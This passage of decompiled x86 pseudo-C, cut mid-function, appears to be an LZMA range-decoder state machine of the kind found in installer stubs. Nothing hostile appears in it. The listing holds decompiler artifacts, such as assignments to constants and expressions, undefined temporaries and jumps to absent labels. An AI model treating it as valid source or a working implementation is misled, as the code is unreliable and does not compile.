                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 8);
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												goto L41;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                      												__eflags = __eax;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L69;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      											goto L132;
                                                                                      										case 8:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      											}
                                                                                      											goto L132;
                                                                                      										case 9:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												goto L90;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      											__eflags = _t259;
                                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                      											goto L76;
                                                                                      										case 0xa:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                      											goto L89;
                                                                                      										case 0xb:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      											L89:
                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      											L90:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      											goto L69;
                                                                                      										case 0xc:
                                                                                      											L100:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t335 = __ebp - 0x70;
                                                                                      											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t335;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											goto L102;
                                                                                      										case 0xd:
                                                                                      											L37:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t122 = __ebp - 0x70;
                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t122;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L39:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      												goto L48;
                                                                                      											}
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												goto L54;
                                                                                      											}
                                                                                      											L41:
                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                      											__eax = __eax + 1;
                                                                                      											__eax = __eax << 8;
                                                                                      											__eax = __eax + __ebx;
                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edx;
                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L39;
                                                                                      											} else {
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										case 0xe:
                                                                                      											L46:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t156 = __ebp - 0x70;
                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t156;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											while(1) {
                                                                                      												L48:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													break;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                      													__ebx = _t170;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													goto L46;
                                                                                      												}
                                                                                      											}
                                                                                      											L54:
                                                                                      											_t173 = __ebp - 0x34;
                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      											__eflags =  *_t173;
                                                                                      											goto L55;
                                                                                      										case 0xf:
                                                                                      											L58:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t203 = __ebp - 0x70;
                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t203;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L60:
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												L55:
                                                                                      												__al =  *(__ebp - 0x44);
                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      												goto L56;
                                                                                      											}
                                                                                      											L61:
                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                      											__edx = __ebx + __ebx;
                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                      											__esi = __edx + __eax;
                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                      												__ebx = _t217;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edi;
                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L60;
                                                                                      											} else {
                                                                                      												goto L58;
                                                                                      											}
                                                                                      										case 0x10:
                                                                                      											L110:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t366 = __ebp - 0x70;
                                                                                      											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t366;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											goto L112;
                                                                                      										case 0x11:
                                                                                      											L69:
                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                      											L132:
                                                                                      											 *(_t612 - 0x54) = _t605;
                                                                                      											goto L133;
                                                                                      										case 0x12:
                                                                                      											goto L0;
                                                                                      										case 0x13:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												_t469 = __ebp - 0x58;
                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      												__eflags =  *_t469;
                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                      												goto L144;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      											goto L130;
                                                                                      										case 0x14:
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                      											L140:
                                                                                      											 *(_t612 - 0x88) = _t533;
                                                                                      											goto L1;
                                                                                      										case 0x15:
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      											__al = __al & 0x000000fd;
                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      											goto L121;
                                                                                      										case 0x16:
                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                      											__eflags = __eax - 4;
                                                                                      											if(__eax >= 4) {
                                                                                      												_push(3);
                                                                                      												_pop(__eax);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x40) = 6;
                                                                                      											__eax = __eax << 7;
                                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                      											goto L145;
                                                                                      										case 0x17:
                                                                                      											goto L145;
                                                                                      										case 0x18:
                                                                                      											L146:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t484 = __ebp - 0x70;
                                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t484;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L148:
                                                                                      											_t487 = __ebp - 0x48;
                                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      											__eflags =  *_t487;
                                                                                      											goto L149;
                                                                                      										case 0x19:
                                                                                      											__eflags = __ebx - 4;
                                                                                      											if(__ebx < 4) {
                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                      												L120:
                                                                                      												_t394 = __ebp - 0x2c;
                                                                                      												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                      												__eflags =  *_t394;
                                                                                      												L121:
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												_t401 = __ebp - 0x60;
                                                                                      												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      												__eflags =  *_t401;
                                                                                      												goto L124;
                                                                                      											}
                                                                                      											__ecx = __ebx;
                                                                                      											__eax = __ebx;
                                                                                      											__ecx = __ebx >> 1;
                                                                                      											__eax = __ebx & 0x00000001;
                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                      											__al = __al | 0x00000002;
                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                      											__eflags = __ebx - 0xe;
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											if(__ebx >= 0xe) {
                                                                                      												__ebx = 0;
                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                      												L103:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													__eax = __eax + __ebx;
                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                                      													__eflags = __eax;
                                                                                      													L109:
                                                                                      													__ebx = 0;
                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                      													 *(__ebp - 0x50) = 1;
                                                                                      													 *(__ebp - 0x44) = 0;
                                                                                      													 *(__ebp - 0x48) = 0;
                                                                                      													L113:
                                                                                      													__eax =  *(__ebp - 0x40);
                                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      														_t392 = __ebp - 0x2c;
                                                                                      														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                      														__eflags =  *_t392;
                                                                                      														goto L120;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__esi = __edi + __eax;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__ax =  *__esi;
                                                                                      													__ecx = __ax & 0x0000ffff;
                                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                                      														__ecx = 0;
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      														__ecx = 1;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      														__ebx = 1;
                                                                                      														__ecx =  *(__ebp - 0x48);
                                                                                      														__ebx = 1 << __cl;
                                                                                      														__ecx = 1 << __cl;
                                                                                      														__ebx =  *(__ebp - 0x44);
                                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      														__cx = __ax;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eax = __eax - __ecx;
                                                                                      														__edi = __edi + 1;
                                                                                      														__eflags = __edi;
                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                      														 *__esi = __ax;
                                                                                      														 *(__ebp - 0x50) = __edi;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __edx;
                                                                                      														0x800 = 0x800 - __ecx;
                                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      														 *__esi = __dx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														L112:
                                                                                      														_t369 = __ebp - 0x48;
                                                                                      														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                      														__eflags =  *_t369;
                                                                                      														goto L113;
                                                                                      													} else {
                                                                                      														goto L110;
                                                                                      													}
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0xc);
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      													__ebx = __ebx | 0x00000001;
                                                                                      													__eflags = __ebx;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													L102:
                                                                                      													_t339 = __ebp - 0x48;
                                                                                      													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                      													__eflags =  *_t339;
                                                                                      													goto L103;
                                                                                      												} else {
                                                                                      													goto L100;
                                                                                      												}
                                                                                      											}
                                                                                      											__edx =  *(__ebp - 4);
                                                                                      											__eax = __eax - __ebx;
                                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      											goto L109;
                                                                                      										case 0x1a:
                                                                                      											L56:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x68);
                                                                                      											__al =  *(__ebp - 0x5c);
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                                      											__ecx =  *(__ebp - 0x14);
                                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      											__eax = __ecx + 1;
                                                                                      											__edx = 0;
                                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t192;
                                                                                      											goto L80;
                                                                                      										case 0x1b:
                                                                                      											L76:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                                      												__eflags = __eax;
                                                                                      											}
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											__cl =  *(__eax + __edx);
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                                      											 *(__eax + __edx) = __cl;
                                                                                      											__eax = __eax + 1;
                                                                                      											__edx = 0;
                                                                                      											_t275 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t275;
                                                                                      											__eax =  *(__ebp - 0x68);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											_t284 = __ebp - 0x64;
                                                                                      											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                      											__eflags =  *_t284;
                                                                                      											 *( *(__ebp - 0x68)) = __cl;
                                                                                      											L80:
                                                                                      											 *(__ebp - 0x14) = __edx;
                                                                                      											goto L81;
                                                                                      										case 0x1c:
                                                                                      											while(1) {
                                                                                      												L124:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													break;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												__cl =  *(__eax + __edx);
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                      												 *(__eax + __edx) = __cl;
